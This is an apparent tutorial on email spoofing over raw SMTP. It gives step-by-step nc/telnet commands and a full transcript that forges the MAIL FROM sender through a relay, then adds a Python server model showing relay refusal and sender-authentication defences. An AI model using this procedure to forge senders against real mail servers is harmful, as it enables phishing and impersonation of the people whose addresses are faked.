Email spoofing
1. Establish a TCP connection
The default port of the SMTP protocol is 25. You can connect to it directly with telnet or nc; nc is recommended.
> telnet domain/ip port
> nc domain/ip port
A 220 status code in the reply means the connection succeeded.
220 ***************************************************************************
2. HELO & EHLO
In the testing so far this step has not been required, and looking through the documentation I found no mention of it either.
HELO
RFC 5321:
A client SMTP SHOULD start an SMTP session by issuing the EHLO command.
In any event, a client MUST issue HELO or EHLO before starting a mail transaction.
The HELO command is used by the client to identify itself to the server. This identity is not authenticated and can be forged freely.
HELO example.com
250 spam.xxx.com Hello [***.**.**.***], pleased to meet you
EHLO
EHLO belongs to the Extended SMTP (ESMTP) commands. It can be used in place of HELO, and the server answers with a list of the extensions it supports.
EHLO example.com
250-spam.xxx.com Hello [***.**.**.***], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-AUTH LOGIN PLAIN
250-XXXXXXXXA
250 XXXB
MAIL FROM
Declares the sender address to the mail server. This is where the sender address is forged; the success status is 250.
MAIL FROM:[email protected]
250 2.1.0 [email protected]... Sender ok
RCPT TO
Declares the recipient. If the address queried is a real email address, the server returns the success status 250.
RCPT TO:[email protected]
250 2.1.5 [email protected]... Recipient ok
DATA
Message body. Sending this command tells the mail server that you are about to send the message body and asks it to receive it; the server replies with 354 and waits for input. The body is terminated by a line containing only a single "." followed by Enter.
DATA
354 Enter mail, end with "." on a line by itself
test_data
.
250 2.0.0 x26DQlgx047262 Message accepted for delivery
QUIT
Requests to end the session and closes the TCP connection.
QUIT
221 2.0.0 spam.xxx.com closing connection
Complete flow
Without authentication
root@debian:~# nc ip port
220 ***************************************************************************
HELO mail.example.com # this command can be omitted
250 spam.example.com Hello [***.**.**.***], pleased to meet you
MAIL FROM: # forge the sender
250 2.1.0 [email protected]... Sender ok
RCPT TO:, # specify the recipient
250 2.1.5 [email protected]... Recipient ok
RCPT TO:[email protected] # to show what happens with a mailbox that cannot be resolved
450 4.4.0 [email protected]... Relaying temporarily denied. Cannot resolve PTR record for ***.**.**.***
DATA # forge the message content
354 Enter mail, end with "." on a line by itself
test # message body
. # end of body input
250 2.0.0 x26DQlh0047262 Message accepted for delivery
QUIT # quit
221 2.0.0 spam.xxx.com closing connection
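As an added illustration, not part of the original post, here is a minimal server-side SMTP dialogue in Python that answers each client line with the reply codes seen in the session above, enforces the RFC 5321 rule that HELO/EHLO must come first, and, unless deliberately configured as an open relay, refuses recipients outside its own domain; the domain and addresses are constructed.

```python
import re

LOCAL_DOMAIN = "example.com"   # constructed: the only domain this server delivers for
ADDR = re.compile(r"^(FROM|TO):\s*<?([^<>\s]+@[^<>\s]+)>?$", re.I)

class SmtpSession:
    """One SMTP session: answers each client line with an RFC 5321 style reply."""

    def __init__(self, open_relay=False):
        self.open_relay = open_relay   # True reproduces the misconfiguration the session above relies on
        self.greeted = False           # set once HELO/EHLO has been seen
        self.sender, self.rcpts, self.body = None, [], None
        self.accepted = []             # (sender, recipients, body) of every message queued

    def handle(self, line):
        if self.body is not None:                       # collecting the message body after DATA
            if line == ".":
                self.accepted.append((self.sender, self.rcpts, "\n".join(self.body)))
                self.sender, self.rcpts, self.body = None, [], None
                return "250 2.0.0 Message accepted for delivery"
            self.body.append(line[1:] if line.startswith("..") else line)  # dot-unstuffing
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):                    # identity is taken on trust, never checked
            self.greeted = True
            return "250 %s Hello, pleased to meet you" % LOCAL_DOMAIN
        if verb == "QUIT":
            return "221 2.0.0 %s closing connection" % LOCAL_DOMAIN
        if not self.greeted:                            # RFC 5321: HELO/EHLO MUST precede a transaction
            return "503 5.5.1 Send HELO/EHLO first"
        m = ADDR.match(arg)
        if verb == "MAIL" and m and m.group(1).upper() == "FROM":
            self.sender = m.group(2)                    # whatever the client claims; SMTP itself verifies nothing
            return "250 2.1.0 %s... Sender ok" % self.sender
        if verb == "RCPT" and m and m.group(1).upper() == "TO":
            if self.sender is None:
                return "503 5.5.1 Need MAIL command"
            rcpt = m.group(2)
            if not self.open_relay and not rcpt.lower().endswith("@" + LOCAL_DOMAIN):
                return "550 5.7.1 %s... Relaying denied" % rcpt   # a closed relay stops outbound forgery
            self.rcpts.append(rcpt)
            return "250 2.1.5 %s... Recipient ok" % rcpt
        if verb == "DATA":
            if not self.rcpts:
                return "503 5.5.1 Need RCPT (recipient)"
            self.body = []
            return '354 Enter mail, end with "." on a line by itself'
        return "500 5.5.2 Command unrecognized"
```

The MAIL FROM branch shows why the sender address can be forged at will: nothing in the protocol checks it, so sender authenticity has to come from SPF, DKIM and DMARC evaluation on the receiving side, and from not relaying for foreign domains.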
Classic case
Article link: HackerTarget SSRF + Location redirect + gopher Multiline Request + email spoofing